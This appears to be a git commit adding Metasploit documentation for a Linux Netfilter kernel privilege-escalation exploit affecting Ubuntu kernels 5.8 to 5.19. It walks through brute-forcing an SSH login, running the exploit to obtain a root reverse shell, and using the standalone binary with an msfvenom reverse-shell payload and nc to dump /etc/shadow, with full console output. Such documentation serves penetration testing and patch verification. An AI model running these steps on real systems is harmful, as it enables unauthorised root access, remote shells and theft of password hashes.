Add module docs, add Ubuntu 22.04 offsets, update check method
This commit is contained in:
Redouane NIBOUCHA
@@ -0,0 +1,149 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a vulnerability in Netfilter, the Linux Kernel component
|
||||
that implements firewall capabilities in Linux.
|
||||
The vulnerability is a type-confusion bug that leads to a heap overflow in kernel memory.
|
||||
The exploit relies on spraying, it may fail, or crash the target system.
|
||||
|
||||
### Install
|
||||
|
||||
The vulnerability exists in linux kernel versions from `5.8-rc1` up to `v5.19-rc5`.
|
||||
this module contains offsets for some vulnerable Ubuntu versions.
|
||||
|
||||
Install Ubuntu 22.04 LTS with a vulnerable kernel version.
|
||||
`apt-get install linux-image-5.15.0-25-generic`
|
||||
Hold shift when you reboot and select the proper kernel version
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Make an Ubuntu target.
|
||||
1. Create a Meterpreter or shell payload and upload it to the Ubuntu target. Or setup openssh-server, and use the corresponding auxiliary module.
|
||||
1. Get a session
|
||||
1. Do: `use exploit/linux/local/netfilter_nft_set_elem_init_privesc`
|
||||
1. Do: `set session <session_id>`
|
||||
1. Do: `set payload <payload>`
|
||||
1. Do: `set lhost <ip>`
|
||||
1. Do: `set [r|l]port <port>`
|
||||
1. Do: `run`
|
||||
1. You should get a new session as the `root` user.
|
||||
1. If it fails, retry, or reboot Ubuntu and retry.
|
||||
|
||||
## Options
|
||||
|
||||
### COMPILE
|
||||
|
||||
[Auto|True|False] This selects the binary to use. `True` will cause the module to upload the source
|
||||
code and perform compilation on target, `False` will cause the module to upload a precompiled binary.
|
||||
`Auto` will cause the module to try compiling the exploit on the target but will fall back to the
|
||||
precompiled option if a compiler cannot be found.
|
||||
|
||||
### WritableDir
|
||||
|
||||
This indicates the location where you would like the payload and exploit binary stored.
|
||||
The default value is `/tmp`
|
||||
|
||||
Due to the exploitation strategy that this module relies on, `/tmp` must be writable, even if
|
||||
`WritableDir` is a different directory. `modprobe_path` gets overwritten with a path to a file
|
||||
in `/tmp`. This file is a bash script that adds the setuid bit to the payload uploaded at
|
||||
`WritableDir`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/scanner/ssh/ssh_login
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.40
|
||||
rhosts => 192.168.0.40
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > set username redouane
|
||||
username => redouane
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > set password user
|
||||
password => user
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > run
|
||||
|
||||
[*] 192.168.0.40:22 - Starting bruteforce
|
||||
[+] 192.168.0.40:22 - Success: 'redouane:user' 'uid=1000(redouane) gid=1000(redouane) groupes=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux hopeful-zhukovky 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
|
||||
[*] SSH session 1 opened (192.168.0.32:46499 -> 192.168.0.40:22) at 2022-07-22 02:44:56 +0200
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/netfilter_nft_set_elem_init_privesc
|
||||
[*] Using configured payload linux/x64/shell_reverse_tcp
|
||||
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set lhost wlan0
|
||||
lhost => wlan0
|
||||
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 1
|
||||
session => 1
|
||||
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
|
||||
|
||||
[!] SESSION may not be compatible with this module:
|
||||
[!] * incompatible session architecture:
|
||||
[*] Started reverse TCP handler on 192.168.0.32:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Dropping pre-compiled binaries to system...
|
||||
[*] Writing '/tmp/z9G2XJ' (761240 bytes) ...
|
||||
[*] Uploading payload...
|
||||
[*] Writing '/tmp/AsfKz' (248 bytes) ...
|
||||
[*] Running payload on remote system...
|
||||
[+] Deleted /tmp/z9G2XJ
|
||||
[+] Deleted /tmp/AsfKz
|
||||
[*] Command shell session 2 opened (192.168.0.32:4444 -> 192.168.0.40:35956) at 2022-07-22 02:45:54 +0200
|
||||
|
||||
id
|
||||
[*] Payload executed! If it was successful, a session should have been created
|
||||
|
||||
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
|
||||
```
|
||||
|
||||
## Notes
|
||||
|
||||
### Included Binaries
|
||||
The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from
|
||||
Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`.
|
||||
|
||||
The exploit adds the setuid bit to the payload, the path given must be absolute, avoid binaries that don't run
|
||||
when the setuid bit is detected.
|
||||
|
||||
Also, the exploit process forks, gets its child to execute the setuid payload binary, and exits
|
||||
(it doesn't call `wait` or `waitpid`). For this reason, don't expect the binary to read input from standard input.
|
||||
|
||||
The following snippet shows an example of how one might run a payload to get
|
||||
a new Bash shell as the `root` user.
|
||||
|
||||
```
|
||||
redouane@wizardly-maxwell:~$ id
|
||||
uid=1000(redouane) gid=1000(redouane) groups=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare)
|
||||
redouane@wizardly-maxwell:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 PrependSetresuid=true PrependSetresgid=true -f elf -o payload
|
||||
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
|
||||
[-] No arch selected, selecting arch: x64 from the payload
|
||||
No encoder specified, outputting raw payload
|
||||
Payload size: 96 bytes
|
||||
Final size of elf file: 216 bytes
|
||||
Saved as: payload
|
||||
redouane@wizardly-maxwell:~$ chmod +x payload
|
||||
redouane@wizardly-maxwell:~$ (echo id; head -n 2 /etc/shadow) | nc -lvvp1337 &
|
||||
[1] 2272
|
||||
redouane@wizardly-maxwell:~$ Listening on 0.0.0.0 1337
|
||||
|
||||
redouane@wizardly-maxwell:~$ ./ubuntu.elf /home/redouane/payload
|
||||
[+] kernel version '5.15.0-25-generic #25-Ubuntu' detected
|
||||
[+] Second process currently waiting
|
||||
[+] Get CAP_NET_ADMIN capability
|
||||
[+] Netlink socket created
|
||||
[+] Netlink socket bound
|
||||
[+] Table table created
|
||||
[+] Set for the leak created
|
||||
[+] Set for write primitive created
|
||||
[*] Leak in process
|
||||
[+] Leak succeed
|
||||
[+] kaslr base found 0xffffffff9f000000
|
||||
[+] physmap base found 0xffff910a00000000
|
||||
[+] modprobe path changed !
|
||||
[+] Modprobe payload setup
|
||||
[?] waitpid
|
||||
[?] sem_post
|
||||
[+++] Got root shell, should exit?
|
||||
Connection received on localhost 56962
|
||||
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
|
||||
root:!:19193:0:99999:7:::
|
||||
daemon:*:19101:0:99999:7:::
|
||||
```
|
||||
Reference in New Issue
Block a user